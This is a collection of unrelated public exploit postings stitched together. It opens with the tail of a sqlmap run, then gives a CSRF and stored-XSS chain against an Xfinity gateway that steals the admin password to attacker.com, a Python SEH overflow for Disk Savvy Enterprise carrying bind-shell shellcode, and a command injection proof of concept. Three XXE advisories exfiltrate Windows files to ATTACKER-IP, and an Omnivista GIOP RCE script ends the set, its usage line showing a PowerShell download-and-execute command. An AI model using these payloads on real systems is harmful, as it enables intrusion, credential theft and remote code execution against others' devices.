• web server operating system: Linux Debian 8.0 (jessie)
• web application technology: Apache 2.4.10
• back-end DBMS: MySQL >= 5.0.12
• [13:30:39] [WARNING] HTTP error codes detected during run:
• 500 (Internal Server Error) - 2715 times
• [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'
•
• [*] shutting down at 13:30:39
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=170
EXPLOIT TITLE: CSRF RCE XFINITY WEB GATEWAY
AUTHOR: Pabstersac
DATE: 1ST OF AUGUST 2016
CVE: N/A
CATEGORY: REMOTE
CONTACT: pabstersac@gmail.com
IF ANYONE HAS COMMUNICATION WITH VENDOR PLEASE NOTIFY THEM SINCE THEY HAVE IGNORED ME.
CSRF FOR COMCAST XFINITY WEB GATEWAY. LEADS TO RCE AND ACCESS TO THE NETWORK AND MORE.
VENDOR HAS BEEN NOTIFIED NUMEROUS TIMES BUT NO RESPONSE RECEIVED.
1) ADD BLOCKED SITE
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value='{"URL": "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
2) ADD BLOCKED KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_add_blockedSite.php" method="post">
<input type="hidden" name='BlockInfo' value=‘{“Keyword”: "http://test1.com", "alwaysBlock": "true"}'>
</form>
<script>document.x.submit();</script>
3) REMOVE BLOCKED SITE OR KEYWORD
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_remove_blockedSite.php" method="post">
<input type="hidden" name='removeBlockInfo' value='{"InstanceID": "6"}'>
</form>
<script>document.x.submit();</script>
4) TRUST/UNTRUST DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_trust_computer.php" method="post">
<input type="hidden" name='TrustFlag' value='{"trustFlag": "true", "HostName": "test", "IPAddress": "10.0.0.82"}'>
</form>
<script>document.x.submit();</script>
5) DISABLE/ENABLE MANAGED SITES
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_enable_manageSite.php" method="post">
<input type="hidden" name='Enable' value='{"Enable": "true"}'>
</form>
<script>document.x.submit();</script>
6) ADD MANAGED SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='service' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='protocol' value='UDP'>
<input type="hidden" name='startPort' value='1234'>
<input type="hidden" name='endPort' value='1234'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
7) DELETE MANAGED SERVICE
http://10.0.0.1/actionHandler/ajax_managed_services.php?del=1
8) DISABLE/ENABLE MANAGED SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_services.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMSStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
9) UNBLOCK DEVICE
http://10.0.0.1/actionHandler/ajax_managed_devices.php?del=2
10) ADD BLOCKED DEVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<img src=x onerror=alert(0)>'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x2'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
11) ENABLE/DISABLE MANAGED DEVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UMDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
12) ADD PORT FORWARDING SERVICE (COMES WITH BONUS STORED XSS ;)
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='<img src=x onerror=alert(1)>'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
</form>
<script>document.x.submit();</script>
13) DELETE A PORT FORWARDING SERVICE
http://10.0.0.1/actionHandler/ajax_port_forwarding.php?del=5
14) EDIT EXISTING PORT FORWARDING SERVICES
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='edit' value='true'>
<input type="hidden" name='name' value=‘huhuhuh???New Name then …’>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='10.0.0.82'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='123'>
<input type="hidden" name='endport' value='123'>
<input type="hidden" name='ID' value='4'>
</form>
<script>document.x.submit();</script>
15) ENABLE/DISABLE PORT FORWARDING
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='set' value='true'>
<input type="hidden" name='UFWDStatus' value='Enabled'>
</form>
<script>document.x.submit();</script>
I’ll ignore port triggering cuz idc about port triggering . . .
16) CHANGE REMOTE MANAGEMENT SERVICE
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='notset'>
<input type="hidden" name='ssh' value='notset'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<script>document.x.submit();</script>
17) CHANGE FIREWALL SETTINGS
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();</script>
18) CHANGE PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com (OR USE THE ONE I ALREADY UPLOADED : http://yourjavascript.com/1663477161/test1.js )
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","/actionHandler/ajaxSet_password_config.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
SHORTEN URL ON GOOGLE (OR USE THE ONE I ALREADY SHORTENED : http://goo.gl/FQHkQj)
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="http://goo.gl/FQHkQj">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
19) GET PASSWORD PoC
UPLOAD test1.js TO yourjavascript.com
CONTENTS ARE:
document.cookie="PHPSESSID=1";k=document.cookie;f=k.replace("PHPSESSID=1","");d=f.replace("auth=","");s=d.replace(";","");g=s.replace("%3D","");t=atob(g);console.log(t);l=t.replace("admin:","");console.log(l);var xhttp=new XMLHttpRequest();xhttp.open("POST","http://attacker.com/get_password.php",true);xhttp.send('configInfo={"newPassword": “testpassword123”, "oldPassword”: “’+ l+’”}’);
SHORTEN URL ON GOOGLE
CREATE HTML FILE :
<form name="x" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<script>document.x.submit();</script>
I PUT ON SRC IN THE SCRIPT TAG MY SHORTENED URL
20) ACCESS DEVICES IN THE NETWORK
<form name="x" action="http://10.0.0.1/actionHandler/ajax_port_forwarding.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='name' value='something'>
<input type="hidden" name='protocol' value='TCP/UDP'>
<input type="hidden" name='ip' value='Target Internal IP'>
<input type="hidden" name='ipv6addr' value='x'>
<input type="hidden" name='startport' value='Target Port'>
<input type="hidden" name='endport' value='Target Port'>
</form>
<script>document.x.submit();</script>
21) CREATE A NEW PRIVATE WI-FI NETWORK WITH THE PASSWORD OF YOUR CHOICE:
<form name="x" action="http://10.0.0.1/actionHandler/ajaxSet_wireless_network_configuration_edit.php" method="post">
<input type="hidden" name='configInfo' value='{"radio_enable":"true", "network_name":"MY-OWN-PRIVATE-PERSONAL-NETWORK", "wireless_mode":"g,n", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"5", "network_password”:”password”, "broadcastSSID":"true", "enableWMM":"true", "ssid_number”:”3”}’>
</form>
<script>document.x.submit();</script>
22) RCE
HTML FILE:
<form name="x" action="http://10.0.0.1/actionHandler/ajax_remote_management.php" method="post">
<input type="hidden" name='http' value='true'>
<input type="hidden" name='httport' value='notset'>
<input type="hidden" name='https' value='true'>
<input type="hidden" name='httpsport' value='notset'>
<input type="hidden" name='allowtype' value='notset'>
<input type="hidden" name='startIP' value='notset'>
<input type="hidden" name='endIP' value='notset'>
<input type="hidden" name='telnet' value='true'>
<input type="hidden" name='ssh' value='true'>
<input type="hidden" name='startIPv6' value='notset'>
<input type="hidden" name='endIPv6' value='notset'>
</form>
<!--Do part 19)-->
<form name="h" action="http://10.0.0.1/actionHandler/ajax_managed_devices.php" method="post">
<input type="hidden" name='add' value='true'>
<input type="hidden" name='type' value='Block'>
<input type="hidden" name='name' value='<script src="shortened url">'>
<input type="hidden" name='mac' value='xx:xx:xx:xx:xx:x8'>
<input type="hidden" name='block' value='true'>
</form>
<form name="f" action="http://10.0.0.1/actionHandler/ajaxSet_firewall_config.php" method="post">
<input type="hidden" name='configInfo' value='{"firewallLevel": "Low", "block_http": "Disabled", "block_icmp": "Disabled", "block_multicast": "Disabled", "block_peer": "Disabled", "block_ident": "Disabled", "disableFwForTrueStaticIP": "undefined"} '>
</form>
<script>document.x.submit();document.h.submit();document.f.submit();</script>
THEN TELNET TO THE IP ADDRESS THAT SENT THE REQUEST TO ATTACKER.COM/GET_PASSWORD.PHP AND USE THE USERNAME 'admin' AND THE PASSWORD YOU GOT IN ATTACKER.COM/GET_PASSWORD.PHP
THE AUTHOR TAKES NO RESPONSIBILITY FOR DAMAGE DONE WITH THIS EXPLOIT.
FOR PUBLISHING OR SENDING OR COPYING THIS EXPLOIT THE AUTHOR MUST BE GIVEN FULL CREDIT FOR THE EXPLOIT.
IF THE VULNERABILITY IS REPORTED TO VENDOR AND VENDOR RESPONDS AND FIXES IT THEN FULL CREDIT MUST BE GIVEN TO THE AUTHOR.
#!/usr/bin/python
import socket,os,time
#SEH Stack Overflow in GET request
#Disk Savvy Enterprise 9.1.14
#Tested on Windows XP SP3 && Windows 7 Professional
host = "192.168.1.20"
port = 80
#badchars \x00\x09\x0a\x0d\x20
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python
buf = ""
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a"+
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77"+
"\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7"+
"\xff\xe7")
seh = "\xc0\x42\x11\x10" #pop pop ret [libspp.dll]
nseh = "\xeb\x06\x90\x90" #jmp short +0x8
egg = "w00tw00t"
offset = 551
buffer_size = 5000
crash = "\x41"*10 + egg + "\x90"*2
crash += buf + "\x90"*(offset-20-len(buf))
crash += nseh + seh + "\x90"*8
crash += egghunter + "\x44"*(buffer_size-offset-16-len(egghunter))
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")
# Exploit Title: Xfinity Gateway: Remote Code Execution
# Date: 12/2/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://xfinity.com
# Platform: php
The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection.
PoC:
POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
Host: 10.0.0.1
User-Agent:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://10.0.0.1/network_diagnostic_tools.php
Content-Length: 91
Cookie: PHPSESSID=; auth=
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4
If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device.
This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-MEDIA-CENTER-XXE-FILE-DISCLOSURE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.microsoft.com
Product:
==================================
Windows Media Center "ehshell.exe"
version 6.1.7600
Vulnerability Type:
====================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Windows Media Center "ehshell.exe" is vulnerable to XML External Entity
attack allowing remote access to ANY files on a victims computer, if they
open
an XXE laden ".mcl" file via a remote share / USB or from an malicious
"windowsmediacenterweb" web link.
Sometimes 'Windows Media Center' will crash, sometimes opens normally and
other times will not open, but the files get accessed and exfiltrated.
Tested Windows 7 SP1
Exploit code(s):
===============
POC exfiltrate "msdfmap.ini" used by MS ADO Remote Data Services.
1) ATTACKER-IP listener
python -m SimpleHTTPServer 8080
2) Create the "FindMeThatBiotch.dtd" DTD file with below contents (host on
ATTACKER-IP in directory where python server is listen)
<!ENTITY % param666 "<!ENTITY % FindMeThatBiotch SYSTEM '
http://ATTACKER-IP:8080/%data666;'>">
3) Create the "EVIL.mcl" file.
<?xml version="1.0"?>
<!DOCTYPE hyp3rlinx [
<!ENTITY % data666 SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % junk SYSTEM "http://ATTACKER-IP:8080/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>
4) Get victim to open the EVIL.mcl ... enjoy your files!
OR create link on webpage to run the file, but "user has to consent first".
<a href="windowsmediacenterweb://ATTACKER-IP:8080/EVIL.mcl">XXE POC</a>
Disclosure Timeline:
=======================================
Vendor Notification: September 1, 2016
Vendor opens Case 34970: September 6, 2016
Vendor reply "Wont Fix" : October 19, 2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-MSINFO32-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
==========================
Windows System Information
MSINFO32.exe v6.1.7601
Windows MSINFO32.EXE Displays a comprehensive view of your hardware, system
components, and software environment.
Parameters
FileName : Specifies the file to be opened. This can be an .nfo, .xml, .txt, or .cab file.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Microsoft Windows MSINFO32.exe is vulnerable to XML External Entity attack
which can potentially allow remote attackers to
gain access to and exfiltrate files from the victims computer if they open
a malicious ".nfo" file via remote share / USB etc.
Upon open the file user will see error message like "System Information is
unable to open this .nfo file. The file might
be corrupt etc..
Tested Windows 7 SP1
Exploit code(s):
===============
Access and exfiltrate Windows "msdfmap.ini" file as trivial POC.
This file contains credentials for MS ADO Remote Data Services.
1) python -m SimpleHTTPServer 8080 (runs on attacker-ip / hosts payload.dtd)
2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-ip:8080?%file;'>">
%all;
3) "FindMeThatBiatch.nfo" (corrupt .NFO file)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://attacker-ip:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Double click to open FindMeThatBiatch.nfo, user gets error MSINFO32
opens... attacker gets files.
OR open via Windows CL:
c:\>msinfo32 \\REMOTE-SHARE\FindMeThatBiatch.nfo
Disclosure Timeline:
======================================
Vendor Notification: September 4, 2016
Vendor Reply "not meet the bar for security servicing": September 7, 2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EVENT-VIEWER-XXE-FILE-EXFILTRATION.txt
[+] ISR: ApparitionSec
[+] CVE: CVE-2019-0948
Vendor:
=================
www.microsoft.com
Product:
========================
Microsoft Event Viewer
Version: 1.0
The Windows Event Viewer shows a log of application and system messages –
errors, information messages, and warnings.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Windows Event Viewer user can import 'Custom View' files, these files
contain XML, the parser processes External Entity potentially allowing
attackers
to gain remote file access to files on a victims system if user imports a
corrupt XML file via remote share/USB (or other untrusted source).
Tested Windows 7 SP1
Exploit code(s):
===============
1) Go to Windows CL type 'eventvwr' to bring up Windows Event Viewer.
2) Action / Import Custom View
3) Import the malicious 'MyCustomView.xml' via remote share or USB for POC
4) Files are accessed and sent to remote server.
User gets error like "The specified custom view is not valid" attacker gets
files!
"payload.dtd" (host on attacker server)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker-server:8080?%file;'>">
%all;
"MyCustomView.xml" (malicious windows Event Custom View XML)
<?xml version="1.0"?>
<!DOCTYPE APPARITION [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Attacker server listener
python -m SimpleHTTPServer 8080
Disclosure Timeline:
=====================================
Vendor Notification: August 30, 2016
Vendor reply: "does not meet the bar for security servicing." August 30,
2016
December 4, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
import socket
import time
import sys
import os
# ref https://blog.malerisch.net/
# Omnivista Alcatel-Lucent running on Windows Server
if len(sys.argv) < 2:
print "Usage: %s <target> <command>" % sys.argv[0]
print "eg: %s 192.168.1.246 \"powershell.exe -nop -w hidden -c \$g=new-object net.webclient;IEX \$g.downloadstring('http://192.168.1.40:8080/hello');\"" % sys.argv[0]
sys.exit(1)
target = sys.argv[1]
argument1 = ' '.join(sys.argv[2:])
# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...
netbiosname = os.popen("nbtscan -s : "+target+" | cut -d ':' -f2").read()
netbiosname = netbiosname.strip("\n")
# dirty functions to do hex magic with bytes...
### each variable has size byte before, which includes the string + "\x00" a NULL byte
### needs to calculate for each
###
def calcsize(giop):
s = len(giop.decode('hex'))
h = hex(s) #"\x04" -> "04"
return h[2:].zfill(8) # it's 4 bytes for the size
def calcstring(param): # 1 byte size calc
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(2) # assuming it is only 1 byte , again it's dirty...
def calcstring2(param):
s = (len(param)/2)+1
h = hex(s)
return h[2:].zfill(4)
##
#GIOP request size is specified at the 11th byte
# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............
# d8 is the size of GIOP REQUEST
# GIOP HEADER Is 12 bytes -
# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte
#phase 1 - add a jobset
giopid = 1 # an arbitrary ID can be put there...
# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...
usernamedata = "xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc".encode('hex') # original "383737302061646d696e697374726174696f6e2c6f3d6e6d63"
#print "Size of usernamedata" + str(len(usernamedata.decode('hex')))
jobname = "MYJOB01".encode('hex') # size of 7 bytes # check also in the captured packet...
addjobset = "47494f50010000000000012600000000" + "00000001" + "01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008" + jobname + "00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d" + usernamedata + "00000000000a6f6d6e69766973626200" # this last part can be changed???
print "Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch"
print "Connecting to target..."
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect((target, 30024))
#p = remote(target, 30024, "ipv4", "tcp")
print "Adding a job..."
p.send(addjobset.decode('hex'))
#p.recv()
data = p.recv(1024)
s = len(data)
#objectkey = "" # last 16 bytes of the response!
objectkey = data[s-16:s].encode('hex')
#print objectkey
# phase 2 - active jobset
print "Sending active packet against the job"
activegiopid = 2
active = "47494f50010000000000003100000000" + "00000002" + "0100000000000010" + objectkey + "0000000741637469766500000000000000"
#print active
p.send(active.decode('hex'))
data2 = p.recv(1024)
#print data2
# phase3 add task
addjobid = 3
print "Adding a task...."
taskname = "BBBBBBB".encode('hex')
servername = netbiosname.encode('hex')
command = "C:\Windows\System32\cmd.exe".encode('hex') #on 32bit
#command = "C:\Windows\SysWOW64\cmd.exe".encode('hex') #on 64bit
commandsize = hex((len(command.decode('hex'))+1))
commandsize = str(commandsize).replace("0x","")
#print "Command size: "+ str(commandsize)
#print command.decode('hex')
#time.sleep(10)
#powershell = str(command)
#powershell = "powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');"
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
argument = str("/c "+argument1).encode('hex')
#argument = str("/c notepad.exe").encode('hex')
#print len(argument.decode('hex'))
#argumentsize = len(str("/c "+powershell))+1
#print "Argument size: "+str(argumentsize)
argumentsize = calcstring2(argument)
#print "argument size: "+str(argumentsize)
#print argument.decode('hex')
def calcpadd(giop):
defaultpadding = "00000000000001"
check = giop + defaultpadding + fixedpadding
s = len(check)
#print "Size: "+str(s)
if (s/2) % 4 == 0:
#print "size ok!"
return check
else:
# fix the default padding
#print "Size not ok, recalculating padd..."
dif = (s/2) % 4
#print "diff: "+str(dif)
newpadding = defaultpadding[dif*2:]
#print "Newpadding: " +str(newpadding)
return giop + newpadding + fixedpadding
addjobhdr = "47494f5001000000" # 8 bytes + 4 bytes for message size, including size of the giop request message
fixedpadding = "000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000"
variablepadding = "000000000001"
#print calcstring(servername)
#print calcstring(taskname)
#print "Command:" +str(command)
#print "command size:"+str(commandsize)
addjob = "00000000000000b30100000000000010" + objectkey + "000000074164644a6f62000000000000000000" + calcstring(taskname) + taskname + "0000000001000000"+ commandsize + command +"00000000" + calcstring(servername) + servername + "000000" + argumentsize + argument + "00"
#print addjob
addjobfin = calcpadd(addjob)
#print addjobfin.decode('hex')
addjobsize = calcsize(addjobfin)
#print "Lenght of the addjob: "+str(len(addjobfin.decode('hex')))
# we need to add the header
finalmsg = addjobhdr + addjobsize + addjobfin
p.send(finalmsg.decode('hex'))
data3 = p.recv(1024)
#print data3
# phase4 - execute task
executeid = 4
print "Executing task..."
execute = "47494f50010000000000003500000000000001100100000000000010" + objectkey + "0000000b457865637574654e6f7700000000000000"
p.send(execute.decode('hex'))
data4 = p.recv(1024)
print "All packets sent..."
